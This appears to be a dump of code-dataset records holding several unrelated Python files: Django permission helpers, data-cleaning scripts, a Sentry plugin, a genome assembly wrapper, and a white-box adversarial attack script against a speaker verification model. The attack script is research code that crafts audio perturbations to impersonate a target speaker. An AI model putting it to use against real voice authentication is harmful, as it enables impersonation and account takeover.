attempts_limit=constants.LOGIN_ATTEMPTS_BEFORE_LOCK,\n delta_minutes=constants.SPAN_ACCOUNT_LOCK_MINUTES):\n \"\"\" Check if the user has prohibition to log in due to many failed attempts\n\n :param user: django user: user to check\n :param attempts_limit: int: number of attempts that block the account\n :param delta_minutes: float/int: number of minutes of the user to keep\n locked.\n :return: bool: True if the user is locked, False if not.\n\n \"\"\"\n\n # From the locks select the one that belong to that user\n locks = Account_Locks.objects.filter(user=user)\n\n # no record of locks, user is free\n if not locks:\n return False\n\n starting = locks[0].timestamp\n attempts = locks[0].attempts\n\n # validity of the lock\n until = starting + timedelta(seconds=60 * delta_minutes)\n record_is_old = until < timezone.now()\n\n # if the record is old enough: user free\n # or if the attempts are less than the limit: user free\n if record_is_old or attempts < attempts_limit:\n # intentionally return the attempts as 0\n return False\n\n # any other case, user locked\n return True\n\n\ndef group_permissions_sort(user):\n \"\"\"\n Returns a dictionary where the keys are the different models and the\n values are formed by the permissions (in human friendly format) that the\n user can access.\n\n :param user: user instance\n :return: OrderedDict: dictionary of permissions organized by module\n\n \"\"\"\n perm_dict = defaultdict(list)\n u_permissions = list(Permission.objects.filter(user=user))\n g_permissions = list(Permission.objects.filter(group__user=user))\n\n for p in u_permissions + g_permissions:\n type_ = str(p.content_type).title() # capitalize first letter\n if p.name not in perm_dict[type_]:\n perm_dict[type_].append(p.name)\n sorted_perms = OrderedDict(sorted(perm_dict.items()))\n\n return sorted_perms\n\n\n@transaction.atomic\ndef add_user_permissions(permissions_list, users):\n \"\"\"\n Intended to be used with default users permissions.\n :param permissions_list: list: list of strings with the permissions\\\n codes the target user will receive\n :param users: list: list of usernames that will receive the permissions\n\n :return: bool: True if assignment was successful, False if not\n \"\"\"\n permissions = Permission.objects.filter(codename__in=permissions_list)\n try:\n for username in users:\n target_user = User.objects.get(username=username)\n target_user.user_permissions.add(*permissions)\n except Exception as e:\n print(e)\n return False\n return True\n\n\n@transaction.atomic\ndef add_groups_permissions(groups_permissions):\n \"\"\" Assign a list of permissions to the given groups\n\n :param groups_permissions: dict: dictionary where the keys are the \\\n groups names and the values are the permissions strings that the group \\\n receive.\n :return: bool: True if assignment was successfull, False if not\n \"\"\"\n\n try:\n for group_name in groups_permissions.keys():\n group = groups_permissions[group_name]\n permissions = group['permissions']\n inherit = group['inherit']\n\n if inherit and inherit in groups_permissions.keys():\n inherit_group = groups_permissions[inherit]\n permissions += inherit_group['permissions']\n\n target_group = Group.objects.get(name=group_name)\n grants = Permission.objects.filter(codename__in=permissions)\n if grants:\n target_group.permissions.add(*grants)\n target_group.save()\n except Exception as e:\n print(e)\n return False\n return True\n","sub_path":"predictvenv/Lib/site-packages/ttaa_base/helpers/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":4369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"546979458","text":"\"\"\"\n @Author:DarknessFor9\n @DateTime:7/9/19 12:21 AM\n\"\"\"\nfrom re import search, match\n\"\"\"\n1-13.type().内置函数type()返回一个类型对象,如下所示,该对象将表示为一个Pythonic类型的字符串.\n>>type(0)\n<type 'int'>\n>>type(.34)\n<type 'float'>\n>>type(dir)\n<type 'builtin_function_or_method'>\n 创建一个能够从字符串中提取实例类型名称的正则表达式.函数将会对类似于<type 'int'>的字符串返回int(其他类型也是如此,如'float',\n 'builtin_function_or_method').注意:你所实现的值将存入类和内置类型的__name__属性中.\n\"\"\"\npattern = r'''(?<=<class ')\\w+(?='>)'''\n\ncontent = [\n r\"<class 'int'>\",\n r\"<class 'str'>\",\n r\"12345\",\n r\"<type 'int'>\"\n]\n\nfor i in content:\n # print(i)\n result = search(pattern, i)\n result1 = match(pattern, i)\n # print(result)\n if result is not None:\n print(result.group())\n\n if result1 is not None:\n print(result1.group())\n","sub_path":"code/ReModule/practice/13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"567067044","text":"\"\"\"Input and output helpers to load in data.\n\"\"\"\nimport numpy as np\n\ndef read_dataset_tf(path_to_dataset_folder,index_filename):\n \"\"\" Read dataset into numpy arrays with preprocessing included\n Args:\n path_to_dataset_folder(str): path to the folder containing samples and indexing.txt\n index_filename(str): indexing.txt\n Returns:\n A(numpy.ndarray): sample feature matrix A = [[1, x1],\n [1, x2],\n [1, x3],\n .......]\n where xi is the 16-dimensional feature of each sample\n\n T(numpy.ndarray): class label vector T = [[y1],\n [y2],\n [y3],\n ...]\n where yi is 1/0, the label of each sample\n \"\"\"\n ###############################################################\n # Fill your code in this function\n ###############################################################\n # Hint: open(path_to_dataset_folder+'/'+index_filename,'r')\n f = open(path_to_dataset_folder + '/' + index_filename, 'r')\n features = f.readlines()\n T = []\n A = []\n for i in features:\n txtpath = i.strip('\\n')\n if(txtpath[0] == '-'):\n txtpath = txtpath[3:]\n label = int(0)\n else:\n txtpath = txtpath[2:]\n label = int(i[0])\n T.append(label)\n txtfile = open(path_to_dataset_folder + '/' + txtpath, 'r')\n x = txtfile.readline().strip('\\r\\n')\n x_arr = x[3:].split()\n x_arr = [float(i) for i in x_arr]\n x_arr = [1]+x_arr\n A.append(x_arr)\n A = np.array(A)\n T = np.transpose([np.array(T)])\n #print(\"T:\", T)\n #print(\"T:\", np.shape(T) )\n #print(\"A\", np.shape(A))\n return A,T\n","sub_path":"Logistic_model/codefromtf/io_tools.py","file_name":"io_tools.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"175761217","text":"#Test\nfrom datetime import datetime\nimport findspark\nfindspark.init()\nfrom pyspark.sql import SQLContext, Window, SparkSession\nfrom pyspark import SparkConf, SparkContext, HiveContext\nfrom pyspark.sql.functions import lit, row_number, monotonically_increasing_id, isnan, when, count, col, avg, udf\nfrom pyspark.sql import functions as F\nfrom pyspark.sql.types import TimestampType\n\n\nconf = SparkConf().setMaster(\"yarn\").set('spark.sql.warehouse.dir' , '/user/hive/warehouse')\nsc = SparkContext(conf = conf)\n\nsqlContext = HiveContext(sc)\n\nprint('1. Cleaning Data')\nprint('1.1 Importing Raw Data')\nIn_Df = sqlContext.read.csv('/Input/loan.csv' , header=True, inferSchema=True)\n\n#Create the database for working with\nsqlContext.sql(\"\"\"create database work_db\"\"\")\n\n#Add an ID variable\nprint('1.1 Creating ID variable')\nIn_Df = In_Df.withColumn('id', monotonically_increasing_id())\nIn_Df = In_Df.drop('member_id') #Drop Member ID because it is Blank\n\n#Drop columns we dont need\nprint('1.2 Dropping unneccesary columns')\nIn_Df = In_Df.drop('url') #A cryptic column with only one value\nIn_Df = In_Df.drop('desc') # A Text column, not much can be extracted from this\nIn_Df = In_Df.drop('zip_code') #Unrelated to default rates\n\n#Create binary default variable\nprint('1.3 Creating binary Default variable')\nIn_Df.createOrReplaceTempView(\"In_Df\")\nIn_Df = sqlContext.sql(\"\"\"select *\n , case when loan_status like '%Fully Paid%' then 0\n when loan_status like '%Current%' then 0\n when loan_status like 'Late (16-30 days)' then 0\n else 1\n end as Default_Ind\n from In_Df\n where loan_status != 'Oct-2015'\n\"\"\")\n\n\nprint('1.4 Dropping unneccesary columns')\nIn_Df = In_Df.drop('debt_settlement')\nIn_Df = In_Df.drop('debt_settlement_flag')\nIn_Df = In_Df.drop('debt_settlement_flag_date')\nIn_Df = In_Df.drop('settlement_status')\nIn_Df = In_Df.drop('settlement_date')\nIn_Df = In_Df.drop('settlement_amount')\nIn_Df = In_Df.drop('settlement_percentage')\nIn_Df = In_Df.drop('settlement_term')\n\n#Hardship Flag\nIn_Df.groupBy(['hardship_flag']).agg(F.count('id')).collect() #VerySparse - Lets remove\nIn_Df.groupBy(['hardship_flag','Default_Ind']).agg(F.count('id')).collect()\n\n#Removing Hardship because it is sparse\nIn_Df = In_Df.drop('hardship_flag')\nIn_Df = In_Df.drop('hardship_type')\nIn_Df = In_Df.drop('hardship_reason')\nIn_Df = In_Df.drop('hardship_status')\nIn_Df = In_Df.drop('deferral_term')\nIn_Df = In_Df.drop('hardship_amount')\nIn_Df = In_Df.drop('hardship_start_date')\nIn_Df = In_Df.drop('hardship_end_date')\nIn_Df = In_Df.drop('payment_plan_start_date')\nIn_Df = In_Df.drop('hardship_length')\nIn_Df = In_Df.drop('hardship_dpd')\nIn_Df = In_Df.drop('hardship_loan_status')\nIn_Df = In_Df.drop('orig_projected_additional_accrued_interest')\nIn_Df = In_Df.drop('hardship_last_payment_amount')\nIn_Df = In_Df.drop('hardship_payoff_balance_amount')\n\nIn_Df = In_Df.drop('recoveries') #This is done after default\n\n#Drop Secondary applicant Status\nIn_Df = In_Df.drop('sec_app_fico_range_low')\nIn_Df = In_Df.drop('sec_app_fico_range_high')\nIn_Df = In_Df.drop('sec_app_earliest_cr_line')\nIn_Df = In_Df.drop('sec_app_inq_last_6mths')\nIn_Df = In_Df.drop('sec_app_mort_acc')\nIn_Df = In_Df.drop('sec_app_open_acc')\nIn_Df = In_Df.drop('sec_app_revol_util')\nIn_Df = In_Df.drop('sec_app_open_act_il')\nIn_Df = In_Df.drop('sec_app_num_rev_accts')\nIn_Df = In_Df.drop('sec_app_chargeoff_within_12_mths')\nIn_Df = In_Df.drop('sec_app_collections_12_mths_ex_med')\nIn_Df = In_Df.drop('sec_app_mths_since_last_major_derog')\n\n#Drop Joint application Variables\nIn_Df = In_Df.drop('annual_inc_joint')\nIn_Df = In_Df.drop('dti_joint')\nIn_Df = In_Df.drop('verification_status_joint')\nIn_Df = In_Df.drop('revol_bal_joint')\n\n#Drop other variables that could be considered useless\nIn_Df = In_Df.drop('title') #Too Dense to extract anything from it\n\n#These variables have an absurd number of missings - DROP!!\nIn_Df = In_Df.drop('open_acc_6m')\nIn_Df = In_Df.drop('open_act_il')\nIn_Df = In_Df.drop('open_il_12m')\nIn_Df = In_Df.drop('open_il_24m')\nIn_Df = In_Df.drop('mths_since_rcnt_il')\nIn_Df = In_Df.drop('total_bal_il')\nIn_Df = In_Df.drop('il_util')\nIn_Df = In_Df.drop('open_rv_12m')\nIn_Df = In_Df.drop('open_rv_24m')\nIn_Df = In_Df.drop('max_bal_bc')\nIn_Df = In_Df.drop('all_util')\nIn_Df = In_Df.drop('total_cu_tl')\nIn_Df = In_Df.drop('inq_last_12m')\nIn_Df = In_Df.drop('mths_since_recent_bc_dlq')\nIn_Df = In_Df.drop('mths_since_recent_revol_delinq')\n\n\n\n\n\n#Check Null values\n#In_Df.select([count(when(isnan(c) | col(c).isNull(), c)).alias(c) for c in In_Df.columns]).show()\n\n#Change character values with missings\nprint('1.5 Imputing null values')\nIn_Df = In_Df.withColumn('annual_inc',In_Df['annual_inc'].cast('float'))\nIn_Df = In_Df.withColumn('total_bal_ex_mort',In_Df['total_bal_ex_mort'].cast('float'))\nIn_Df = In_Df.withColumn('loan_amnt',In_Df['loan_amnt'].cast('float'))\nIn_Df = In_Df.withColumn('dti',In_Df['dti'].cast('float'))\nIn_Df = In_Df.withColumn('last_pymnt_amnt',In_Df['last_pymnt_amnt'].cast('float'))\nIn_Df = In_Df.withColumn('open_acc',In_Df['open_acc'].cast('int'))\nIn_Df = In_Df.withColumn('revol_bal',In_Df['revol_bal'].cast('int'))\n\n\nIn_Df = In_Df.na.fill({'emp_title':'Not-Specified'\n ,'annual_inc':In_Df.approxQuantile('annual_inc' ,[0.5] , 0)[0]\n #,'title':'Not-Specified'\n ,'addr_state':'CA'#Its the biggest state...\n ,'last_pymnt_amnt':In_Df.approxQuantile('last_pymnt_amnt' ,[0.5] , 0)[0]\n ,'collection_recovery_fee':0\n ,'inq_last_6mths':0\n ,'delinq_2yrs':0\n ,'open_acc':In_Df.approxQuantile('open_acc' ,[0.5] , 0)[0]\n ,'pub_rec':0\n ,'revol_bal':In_Df.approxQuantile('revol_bal' ,[0.5] , 0)[0]\n ,'delinq_amnt':0\n ,'disbursement_method':'Cash'\n ,'dti':In_Df.approxQuantile('dti' ,[0.5] , 0)[0]\n })\n\n#Impute\nprint('1.6 Cleaning up categorical columns')\nIn_Df.createOrReplaceTempView(\"In_Df\")\nIn_Df = sqlContext.sql(\"\"\"select *\n , coalesce(earliest_cr_line, issue_d) as earliest_cr_line_impute\n , case when purpose not in ('debt_consolidation'\n , 'credit_card'\n , 'home_improvement'\n , 'other'\n , 'major_purchase'\n , 'medical'\n , 'small_business'\n , 'car'\n , 'vacation'\n , 'moving'\n , 'house'\n , 'wedding'\n , 'renewable_energy'\n , 'educational'\n ) then 'other'\n else purpose\n end as purpose_clean\n \n , case when disbursement_method = 'N' then 'Cash'\n else disbursement_method\n end as disbursement_method_clean\n \n , case when tot_coll_amt is null or tot_coll_amt = 0 then 0\n else 1\n end as Secured_Ind\n \n \n from In_Df\n\"\"\")\n\n\nIn_Df = In_Df.drop('earliest_cr_line')\nIn_Df = In_Df.drop('next_pymnt_d')\nIn_Df = In_Df.drop('purpose')\nIn_Df = In_Df.drop('disbursement_method')\n\n#Create function to change date\ndef Str_2_Dte(x):\n return(datetime.strptime(x , '%d-%b-%Y'))\n\nStr_2_Dte_udf = udf(Str_2_Dte , TimestampType())\nsqlContext.udf.register('SQL_Str_2_Dte_udf', Str_2_Dte_udf)\n\n\n#Only Keep \"important\" variables - varibales that might identify a default\n#We are using last payment date to derive the default date - so remove all invalid ones\nprint('1.7 Keeping variables required for analysis')\nIn_Df.createOrReplaceTempView(\"In_Df\")\nIn_Df = sqlContext.sql(\"\"\"select\n id\n , loan_amnt\n , term\n , int_rate\n , installment\n , grade\n , sub_grade\n , emp_title\n , emp_length\n , home_ownership\n , annual_inc\n , dti\n , tot_coll_amt\n , purpose_clean\n , Secured_Ind\n , delinq_amnt\n , cast(SQL_Str_2_Dte_udf(upper(concat('01-',last_pymnt_d))) as Date) as last_pymnt_dte\n , cast(SQL_Str_2_Dte_udf(upper(concat('01-',issue_d))) as Date) as issue_dte\n , Default_Ind\n , loan_status\n from In_Df\n where last_pymnt_d is not null \n and last_pymnt_d like '%-20%'\n \"\"\")\n\n\nIn_Df.createOrReplaceTempView(\"In_Df\")\nIn_Df = sqlContext.sql(\"\"\"select\n *\n , Case when Default_Ind = 1 then Add_months(last_pymnt_dte, 1)\n end as Default_dte\n , Case when loan_status like '%Fully Paid%' then last_pymnt_dte\n end as Maturity_Dte\n \n from In_Df\n \"\"\")\n\nIn_Df = In_Df.drop('loan_status')\n\nprint('1.8 Writing Cleaned table to Hive DB')\nIn_Df.createOrReplaceTempView(\"In_Df\")\nsqlContext.sql('''create table work_db.Inp_Data as \n (select * from In_Df)''')\n#In_Df.coalesce(1).write.mode('overwrite').csv('hdfs://localhost:9000/SSP/Project/01_Cleaned_Data' , header=True)\n\n#Load to Hive Database\nsc.stop()\n","sub_path":"SSP-Deployment/Scripts/01_Clean_Up.py","file_name":"01_Clean_Up.py","file_ext":"py","file_size_in_byte":9416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"457198802","text":"# Should we include the VAD step? nope !\n# Insert differentiable fbank extraction before input to network\n# need to consider : audio length? audio clip? noise evaluation\n\n#Attack schema design: How to set the threshold\n# Using create_test_data in test_model.py to generate (1A, 1P, 100N)\n# Select one negative audio as source audio\n# first evaluate to get the optimum eer and threshold, then adding noise to surpass this threshold\nimport matlab\nimport matlab.engine\nimport numpy as np\nimport librosa\nimport keras\nimport sys\nsys.path.append('../speakerVerificationSystem/')\nimport tensorflow as tf\nimport constants as c\nimport keras.backend as K\nimport pandas as pd\nimport soundfile\nimport glob\n\nfrom models import my_convolutional_model\nfrom eval_metrics import evaluate\n#from test_model import create_test_data\nfrom attack_utils import cosineDistanceLoss, cal_snr, load_wavs, cal_audiospec\n\nDEBUG = 0\nclass Attack():\n def __init__(self, checkpoint_path, step_size = 0.01, num_steps = 200, wav_dir = c.ATTACK_WAV_DIR, \n output_dir = './adversarial/', embedding_dir = '../data/embeddings/', log_file = './output.log'):\n self.step_size = step_size\n self.num_steps = num_steps \n self.checkpoint_path = checkpoint_path\n self.optimizer = keras.optimizers.Adam(lr = step_size)\n self.print_steps = self.num_steps / 20\n self.output_dir = output_dir\n self.dataset_dir = wav_dir\n self.embedding_dir = embedding_dir\n self.log_file = log_file\n # Load model in intialization\n \n input_shape = (25840, )\n #IF debug == 1\n #self.threshold_plh = K.backend.placeholder(shape=(1, 160, 257), name='threshold_plh')\n threshold_input_shape = ( 160, 257)\n # The spectrogram's shape of orignal audio\n ori_spec_shape = (160, 257)\n model = my_convolutional_model(input_shape, threshold_input_shape, ori_spec_shape, batch_size = 1, num_frames = 160)\n #4. Load layers weigths by name\n model.load_weights(self.checkpoint_path, by_name = True)\n\n for layer in model.layers[3:]:\n layer.trainable = False\n \n # Ensure trainable variables\n model.layers[1].trainable = True\n model.layers[3].trainable = True\n# print(model.layers)\n my_loss = cosineDistanceLoss() \n \n model.compile(optimizer = self.optimizer, loss = my_loss, metrics= ['accuracy'])\n self.model = model\n \n \n def calculate_sim(self, target_speaker_model, positive_embedding, neg_embeddings):\n anchor = np.tile(target_speaker_model, (neg_embeddings.shape[0] + 1, 1))\n pos_neg_embeddings = np.concatenate((positive_embedding, neg_embeddings), axis = 0)\n mul = np.multiply(anchor, pos_neg_embeddings)\n sim = np.sum(mul, axis = 1)\n #print(sim)\n return sim\n\n def find_threshold_for_target(self, target_speaker, num_pos = 1, num_neg = 30):\n # The goal of this function is to extract several batches of samples like (5AN, 1P, 30N)\n # Enroll with 5AN\n # Build threshold using (embedding, 1P, 29N)\n # Some noise is added to the last negative utterance for attack\n dataset_dir = self.dataset_dir\n vox = load_wavs(dataset_dir)\n unique_speakers = sorted(list(vox['speaker_id'].unique()))\n np.random.shuffle(unique_speakers)\n\n #print(\"attack for speaker {}\".format(unique_speakers[ii]))\n positive_files = vox[vox['speaker_id'] == target_speaker]\n\n #We need at least num_anc + num_pos audios from on speaker\n positive_file = positive_files.sample(num_pos, replace=False)\n negative_files = vox[vox['speaker_id'] != target_speaker].sample(n=num_neg, replace=False)\n\n _rd_threshold = np.random.rand(1, 160, 257)\n _rd_ori_audiospec = np.random.rand(1, 160, 257)\n\n target_speaker_model = np.load(self.embedding_dir + target_speaker + '.npy')\n #get the threshold\n positive_audio,fs = librosa.load(positive_files[0:1]['wav'].values[0], c.SAMPLE_RATE)\n positive_audio = np.reshape(positive_audio, (1,25840))\n positive_embedding = self.model.predict_on_batch([positive_audio, _rd_threshold, _rd_ori_audiospec])\n neg_embeddings = []\n for i in range(num_neg):\n audio,fs = librosa.load(negative_files[i:i+1]['wav'].values[0], c.SAMPLE_RATE)\n audio = np.reshape(audio, (1, 25840))\n embedding = self.model.predict_on_batch([audio, _rd_threshold, _rd_ori_audiospec])\n embedding = np.reshape(embedding, (1, 512))\n neg_embeddings.append(embedding)\n neg_embeddings = np.asarray(neg_embeddings)\n neg_embeddings = np.reshape(neg_embeddings, (num_neg, 512))\n # calculate similarity between anchor and positive, negative embeddings\n y_pred = self.calculate_sim(target_speaker_model, positive_embedding, neg_embeddings)\n y_true = np.hstack(([1] * num_pos, np.zeros( num_neg )))\n fm, tpr, acc, eer, threshold = evaluate(y_pred, y_true)\n print(\"fm {}; tpr {}; acc{}; eer {}; threshold {}\".format(fm, tpr, acc, eer, threshold))\n return threshold\n #target_threshold = 0.75\n #success_cnt += self.attack_simple(source_wav, path_to_save, target_speaker_model, target_threshold)\n #break\n #if (DEBUG == 1):\n # break\n #print(\"success rate\", success_cnt, 40)\n def attack_simple(self, source_wav, target_speaker, path_to_save, target_threshold, target_phrase):\n f = open(self.log_file, 'a+')\n success = 0\n #source_wav = self.dataset_dir + source_wav\n\n #0. load target speaker embedding\n target_embedding_vector = np.load(self.embedding_dir + target_speaker + '_' + target_phrase + '.npy')\n target_embedding_vector = np.reshape(target_embedding_vector, (1, 512))\n #1. First load audio\n original_audio,fs = librosa.load(source_wav, c.SAMPLE_RATE)\n assert(fs == 16000)\n original_audio = np.reshape(original_audio, (1, len(original_audio)))\n #print(original_audio.shape[1])\n output_wav = np.zeros((1,1))\n noise = np.zeros((1,1))\n for index in range(0, original_audio.shape[1], 25840):\n cliped_audio = original_audio[:, index: min(index+25840, original_audio.shape[1])]\n #cliped_audio = np.reshape(cliped_audio, (1,cliped_audio.shape[1]))\n #print(cliped_audio.shape)\n ori_audiospec = np.random.rand(1,160,257)\n _rd_threshold = np.random.rand(1, 160, 257)\n #perturbation = np.zeros((1, 25840),dtype='float32')\n perturbation = np.random.rand(1, 25840) * 1e-3\n if cliped_audio.shape[1] != 25840:\n output_wav = np.column_stack((output_wav, cliped_audio))\n noise = np.column_stack((noise, np.zeros((1, cliped_audio.shape[1]) )))\n continue\n \n \n zero_weights = np.zeros((25840,))\n self.model.layers[1].set_weights([zero_weights])\n new_audio = cliped_audio + perturbation\n \n steps_token = self.num_steps\n success = 0\n for i in range(self.num_steps):\n loss,_ = self.model.train_on_batch([new_audio, _rd_threshold, ori_audiospec ], target_embedding_vector)\n\n perturbation += self.step_size * (self.model.layers[1].get_weights()[0])\n \n self.model.layers[1].set_weights([zero_weights])\n new_audio = cliped_audio + perturbation\n \n \n if (loss < 1 - target_threshold):\n print(\"success! at step {} with loss {}\\n\".format(i, loss))\n success = 1\n steps_token = i\n break\n if (i % self.print_steps == 0): \n print(\"clip {} step {} loss {} perturbation [max] {} [min] {} [avg] {}\".format(index, i,loss, np.max(perturbation), np.min(perturbation), np.mean(perturbation)))\n f.write(path_to_save + ' ' + str(index) + ' ' + str(steps_token) + ' ' + str(loss) + ' ' + str(success) + '\\n')\n #output_wav.append(new_audio)\n output_wav = np.column_stack((output_wav, new_audio))\n noise = np.column_stack((noise, perturbation))\n #if DEBUG == 1:\n # break\n # save the adversarial audio\n output_wav = output_wav[:,1:]\n output_wav = np.array(output_wav)\n #print(output_wav)\n noise = noise[:, 1:]\n noise = np.asarray(noise)\n adversarial_audio = np.reshape(output_wav, (original_audio.shape[1], 1))\n noise = np.reshape(noise, (original_audio.shape[1], 1))\n #cal snr\n snr = cal_snr(original_audio, noise)\n print('snr', snr)\n f.write(str(snr) + '\\n')\n #if (DEBUG != 1):\n soundfile.write(path_to_save, adversarial_audio, c.SAMPLE_RATE, subtype='PCM_16')\n print(\"save to\", path_to_save)\n \n f.close()\n return success\nif __name__ == '__main__':\n #parser = argparse.ArgumentParser(description = \"Attack [target] audio with a [source] audio\")\n #parser.add_argument('--target_audio', dest= 'target_audio', type=str, help=\"target audio name\", required=True)\n #parser.add_argument('--source_audio', dest= 'source_audio', type=str, help=\"source audio name\", required=True)\n #parser.add_argument('--adv_audio_path', dest= 'adv_audio_path', type=str, help=\"output path for adversarial audio\", required=True)\n \n #read attack trails from the metadata, in a format [source ,target, adv_path]\n #parser.add_argument('--num_steps', dest= 'num_steps', type=int, default = 100, help=\"num_steps\")\n #args = parser.parse_args()\n #Need to enroll and get the embeddings for the target speakers\n\n checkpoint_path = '../speakerVerificationSystem/checkpoints/model_17200_0.54980.h5'\n output_dir = '../data/adversarial_msasv/'\n log_file = './output_threshold_msasv.log'\n attack = Attack(checkpoint_path, step_size = 0.01, num_steps = 400, wav_dir = c.ATTACK_WAV_DIR, \n output_dir = output_dir, embedding_dir = '../data/embeddings/', log_file = log_file)\n meta_file = './trials_msasv.txt'\n \n f = open(meta_file)\n for line in f.readlines():\n arr = line.strip().split(' ')\n source_audio = arr[0]\n #target_phrase = source_audio.split('/')[-1].split('_')[1]\n target_phrase = 'ph'\n target_speaker = arr[1]\n adv_path = output_dir + source_audio.split('/')[-1].split('.')[0] + '_' + target_speaker + '.wav'\n \n #threshold = attack.find_threshold_for_target(target_speaker)\n threshold = 0.8\n print(source_audio, target_speaker, adv_path, threshold)\n attack.attack_simple(source_audio, target_speaker, adv_path, target_threshold = threshold, target_phrase=target_phrase)","sub_path":"white-box-attack/attack_whole.py","file_name":"attack_whole.py","file_ext":"py","file_size_in_byte":10975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"295517605","text":"\"\"\"\nsentry.plugins.bases.tag\n~~~~~~~~~~~~~~~~~~~~~~~~\n\n:copyright: (c) 2010-2012 by the Sentry Team, see AUTHORS for more details.\n:license: BSD, see LICENSE for more details.\n\"\"\"\nfrom sentry import app\nfrom sentry.models import FilterValue, MessageFilterValue\nfrom sentry.plugins import Plugin\nfrom django.db.models import Sum\n\n\nclass TagPlugin(Plugin):\n tag = None\n tag_label = None\n index_template = 'sentry/plugins/bases/tag/index.html'\n widget_template = 'sentry/plugins/bases/tag/widget.html'\n\n def get_tag_values(self, event):\n \"\"\"\n Must return a list of values.\n\n >>> get_tag_pairs(event)\n [tag1, tag2, tag3]\n \"\"\"\n raise NotImplementedError\n\n def get_unique_tags(self, group):\n return group.messagefiltervalue_set.filter(\n key=self.tag,\n ).values_list(\n 'value',\n ).annotate(\n times_seen=Sum('times_seen'),\n ).values_list(\n 'value',\n 'times_seen',\n 'first_seen',\n 'last_seen',\n ).order_by('-times_seen')\n\n def panels(self, request, group, panel_list, **kwargs):\n panel_list.append((self.get_title(), self.get_url(group)))\n return panel_list\n\n def view(self, request, group, **kwargs):\n return self.render(self.index_template, {\n 'title': self.get_title(),\n 'tag_label': self.tag_label,\n 'tag_name': self.tag,\n 'unique_tags': self.get_unique_tags(group),\n 'group': group,\n })\n\n def widget(self, request, group, **kwargs):\n return self.render(self.widget_template, {\n 'title': self.get_title(),\n 'tag_label': self.tag_label,\n 'tag_name': self.tag,\n 'unique_tags': list(self.get_unique_tags(group)[:10]),\n 'group': group,\n })\n\n def post_process(self, group, event, is_new, is_sample, **kwargs):\n for value in self.get_tag_values(event):\n FilterValue.objects.get_or_create(\n project=group.project,\n key=self.tag,\n value=value,\n )\n\n app.buffer.incr(MessageFilterValue, {\n 'times_seen': 1,\n }, {\n 'group': group,\n 'project': group.project,\n 'key': self.tag,\n 'value': value,\n }, {\n 'last_seen': group.last_seen,\n })\n","sub_path":"src/sentry/plugins/bases/tag.py","file_name":"tag.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"577008925","text":"import os\nimport sys\nimport subprocess\nfrom Bio import SeqIO\nimport argparse\n\n\ndef run_spades(sw_path, r1, r2, threads, output):\n \"\"\"\n Function that run spades on a set of reads\n\n :param sw_path: Path to Spades\n :param r1: Forward read\n :param r2: Reverse read\n :param threads: Number of threads to use\n :param output: Output folder\n :return:\n \"\"\"\n\n try:\n subprocess.call([sw_path, \"-1\", r1, \"-2\", r2, \"-t\", threads, \"-o\", output, \"--careful\", \"--cov-cutoff\", \"auto\"])\n\n except OSError as e:\n if e.errno == os.errno.ENOENT:\n sys.exit(\"Spades path not found\")\n else:\n sys.exit(\"Error with the input files\")\n\ndef rename_contigs(prefix):\n \"\"\"\n Function used to rename the contigs generated by Spades (NODEXX), with the name\n of the genome or project\n :param prefix: Prefix to use for the genome\n :return:\n \"\"\"\n\n contig_file = prefix + \"/contigs.fasta\"\n output_file = prefix + \"/\" + prefix + \".fasta\"\n renamed_contig_info = []\n contig_table = []\n\n # Id counter\n count = 1\n\n for record in SeqIO.parse(open(contig_file, 'r'), \"fasta\"):\n coverage = float(record.id.split(\"_\")[5])\n length = len(record.seq)\n\n # replace the name\n new_name = prefix + \"_\" + str(count)\n record.id = new_name\n record.name = ''\n record.description = ''\n\n # Store the information\n contig_table.append([new_name, str(coverage), str(length)])\n\n renamed_contig_info.append(record)\n count += 1\n\n SeqIO.write(renamed_contig_info, open(output_file, 'w'), \"fasta\")\n\n output_table = open(prefix + \"/\" + prefix + \".tab\", 'w')\n\n for entry in contig_table:\n output_table.write(\"\\t\".join(entry) + \"\\n\")\n\n output_table.close()\n contig_count = len(contig_table)\n assembly_size = sum([int(i[2]) for i in contig_table])\n\n average_coverage = sum([float(i[1]) for i in contig_table]) / contig_count\n\n return contig_count, assembly_size, average_coverage\n\n# _______________\n\nprogram_description = \"Script useful to assemble multiple genomes using Spades. The parameters used within the script\" \\\n \"are:\" \\\n \"--cov-cutoff auto\" \\\n \"--careful\" \\\n \"\" \\\n \"The user needs to provide the number of threads to use.\" \\\n \"\" \\\n \"Also, this script will replace the default name of the contigs in Spades (nodeXXX), with the\"\\\n \"names of the genomes (GenomeXXX)\"\\\n\nparser = argparse.ArgumentParser(description=program_description)\nparser.add_argument(\"-i\", \"--input_list\", type=str, required=True,\n help=\"Table with the genomes to assemble. This is a table with 3 columns. The first is the genome\"\n \"prefix to use. The second is the path forward read, the third is the path to the reverse read\")\n\nparser.add_argument(\"-s\", \"--spades_version\", type=str, required=True, help=\"Path to SPades.py\")\nparser.add_argument(\"-c\", \"--cpu\", type=str, required=True, help=\"Number of threads to use\")\nargs = parser.parse_args()\n\n\n# Open the list and start running Spades\n\nreport_file = open(\"assembly_report.txt\", 'w')\n\nfor line in open(args.input_list, 'r'):\n line = line.rstrip()\n\n genome_name, forward, reverse = line.split(\"\\t\")\n\n run_spades(args.spades_version, forward, reverse, args.cpu, genome_name)\n\n total_contigs, size, avg_coverage = rename_contigs(genome_name)\n\n report_output = [genome_name, str(total_contigs), str(size), str(avg_coverage)]\n report_file.write(\"\\t\".join(report_output) + \"\\n\")\n\nreport_file.close()\n","sub_path":"Assembly/Run_SpadesMultipleGenomes.py","file_name":"Run_SpadesMultipleGenomes.py","file_ext":"py","file_size_in_byte":3704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"149189863","text":"import requests\nimport time\nimport keras\nfrom keras.models import load_model\nimport cv2\nimport numpy as np\nfrom PIL import Image\nimport pandas as 